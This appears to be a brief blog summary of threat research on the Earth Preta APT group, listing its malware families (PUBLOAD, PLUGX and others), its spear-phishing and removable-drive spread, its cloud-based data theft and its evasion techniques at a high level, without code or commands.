Preta Power: innovative tools empower cyber enhancement initiatives

Read Time:1 Minute, 31 Second

Earth Preta, the notorious Chinese Advanced Persistent Threat (APT) group, has been active for over a decade, targeting government entities, academia, and research organizations globally. Their recent addition of new tools to their arsenal has raised concerns among cybersecurity experts.
Earth Preta’s Evolution:
Researchers have observed a shift in Earth Preta’s attack strategy. They are now using a variant of the HIUPAN worm to spread the PUBLOAD malware through removable drives. This marks a departure from their previous spear-phishing tactics.
PUBLOAD Malware:
PUBLOAD serves as the primary control tool for data gathering and exfiltration. It gathers data using RAR and exfiltrates it via cURL to FTP sites. Earth Preta has also introduced additional tools like FDMTP (a malware downloader based on TouchSocket) and PTSOCKET (an alternative exfiltration method).
Spear-Phishing Campaign:
Earth Preta’s multi-stage attack begins with a spear-phishing email containing a .url attachment. This triggers a complex process involving multiple malware components, including a decoy document, DOWNBAIT, PULLBAIT, CBROVER, and PLUGX. PLUGX is a sophisticated backdoor that provides the attackers with remote access to the target system.
Data Theft:
For data gathering, Earth Preta employs RAR and FILESAC to target specific file types and date ranges. The collected data is exfiltrated using OneDrive and Graph API, taking advantage of Microsoft’s cloud services.
Infrastructure and Evasion:
The attack infrastructure includes a WebDAV server that hosts malware and decoy documents. Earth Preta uses various evasion techniques, such as XOR encryption, DLL side-loading, and RC4 encryption, to evade detection and analysis.
Conclusion:
Earth Preta’s evolving tactics and sophisticated evasion techniques pose a significant threat to various sectors, particularly government entities in the Asia-Pacific region. Cybersecurity organizations must remain vigilant and implement effective defense mechanisms to mitigate the risk of compromise from this APT group.

Leave a Reply

Your email address will not be published. Required fields are marked *